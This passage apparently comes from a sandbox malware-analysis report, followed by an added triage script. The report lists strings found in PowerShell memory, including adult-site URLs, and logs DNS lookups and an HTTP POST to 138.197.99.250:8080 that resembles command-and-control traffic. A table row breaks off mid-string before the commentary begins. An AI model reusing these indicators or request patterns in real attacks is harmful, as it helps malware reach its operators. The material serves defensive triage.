              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.twitter.com (Twitter)
              Source: unknown
              DNS traffic detected: queries for: wheelcomoving.com
              Source: unknown
              HTTP traffic detected: POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1
                  DNT: 0
                  Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/
                  Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1Cxtn
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: 138.197.99.250:8080
                  Content-Length: 6500
                  Connection: Keep-Alive
                  Cache-Control: no-cache
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                  Date: Thu, 07 Jan 2021 10:52:58 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/"
                  Upgrade: h2,h2c
                  Connection: Upgrade, Keep-Alive
                  Vary: Accept-Encoding
                  Keep-Alive: timeout=5, max=100
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 0d 0a 09 0d 0a
                  Data Ascii: 32<!DOCTYPE html><html lang="en-US"><head>
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C90
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://freejavporn.mobi/
              Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://go-indian.pro/
              Source: powershell.exe, 00000004.00000002.289836122.0000018A15796000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://graph.ppe.windows.net
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://graph.windows.net
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://graph.windows.net/
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://hindiporn.pro/
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://hotindianporn.mobi/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://indianpornmovies.info/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA858
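The rows above come in two forms: a Source of `<process>, <dump>.sdmp` means the string was found in a process memory dump, while a Source of `<name>.<n>.dr` means it came from a file dropped during the run (the 6CAFC0F8-... file here is Office-related; its URLs are Office service endpoints, as are the Bing Maps strings in svchost.exe). The rows worth a second look are the ones whose Source is powershell.exe, which is the stage the report flags under "Potential dropper URLs found in powershell memory". Two caveats when reading them: strings ending in `=` or `?` are templates whose value is appended at runtime, and cut-off fragments such as `https://dynamic.t` or `https://go.micro` must not be treated as hosts. The script below is an added example, not part of the Joe Sandbox report: it parses rows in this format (the fused `...sdmpString found ...` extraction form as well as the `|`-separated form), groups the URLs by origin, and lists those found in powershell.exe memory that are not on a small allowlist of hosts one expects in Office, Bing Maps and PowerShell-module strings. The allowlist and the names given to the fields of the `.sdmp` file name (process index, dump pass, dump id, base address, protection, region type) are my assumptions, not anything the report defines.

```python
"""Parse Joe Sandbox 'String found in binary or memory' rows and sort the URLs
by where they were found, so the ones sitting in powershell.exe memory can be
triaged apart from ordinary Office / Bing Maps telemetry strings."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: a few rows copied from this report, in the fused form
# in which they appear after extraction.
SAMPLE_ROWS = """\
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://graph.windows.net
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://dirtyindianporn.info/
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
"""

# One report row; the optional " | " accepts the separated form of the table.
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<sources>.+?)\s*(?:\|\s*)?String found in binary or memory:\s*(?P<url>\S+)\s*$"
)

# Memory-dump file name as Joe Sandbox writes it. The field names are my
# reading of the scheme and are an assumption, not documented in the report.
SDMP_RE = re.compile(
    r"^(?P<proc_idx>[0-9A-F]{8})\.(?P<dump_pass>[0-9A-F]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<kind>[0-9A-F]{8})\.sdmp$"
)

# Illustrative allowlist of hosts expected in Office / Bing Maps / PowerShell
# module strings; chosen for this report, not provided by Joe Sandbox.
EXPECTED_HOSTS = (
    "microsoft.com", "office.com", "office.net", "windows.net", "live.com",
    "virtualearth.net", "onenote.com", "dynamics.com", "acompli.net",
    "github.com", "googleapis.com",
)


def parse_sources(field):
    """Turn the Source column into (origin, dump_name, dump_fields) tuples.

    A process dump is written '<process>, <dump>.sdmp' (several may be
    comma-joined); a dropped file is a single '<name>.<n>.dr' token."""
    out, pending = [], None
    for tok in (t.strip() for t in field.split(",")):
        if tok.endswith(".sdmp"):
            m = SDMP_RE.match(tok)
            out.append((pending, tok, m.groupdict() if m else None))
            pending = None
        elif tok.endswith(".dr"):
            out.append((tok, None, None))
        else:
            pending = tok  # process name; its dump token follows
    return out


def parse_row(line):
    m = ROW_RE.match(line)
    if not m:
        return None
    return {"sources": parse_sources(m["sources"]), "url": m["url"]}


def parse_report(text):
    return [r for r in (parse_row(l) for l in text.splitlines()) if r]


def urls_by_origin(rows):
    """Group URLs by the process or dropped file they were found in."""
    grouped = defaultdict(set)
    for r in rows:
        for origin, _dump, _fields in r["sources"]:
            grouped[origin].add(r["url"])
    return dict(grouped)


def _expected(host):
    return any(host == h or host.endswith("." + h) for h in EXPECTED_HOSTS)


def triage(rows, watch=("powershell.exe",)):
    """URLs found in memory of the watched script-host processes that are not
    on the allowlist: the candidates to compare with the decoded PowerShell."""
    hits = set()
    for r in rows:
        host = urlsplit(r["url"]).hostname or ""
        procs = {o for o, dump, _ in r["sources"] if dump is not None and o in watch}
        if procs and not _expected(host):
            hits.update((p, r["url"]) for p in procs)
    return sorted(hits)


if __name__ == "__main__":
    rows = parse_report(SAMPLE_ROWS)
    for origin, urls in sorted(urls_by_origin(rows).items()):
        print(f"{origin}: {len(urls)} URL(s)")
    for proc, url in triage(rows):
        print(f"triage {proc}: {url}")
```

Run against the full table, `triage()` returns the powershell.exe rows (the adult-site URLs above and any others outside the allowlist); the next step is to match them against the URLs carved from the decoded PowerShell command line rather than to treat every one as a download location, since a string in memory may equally come from a page the script fetched.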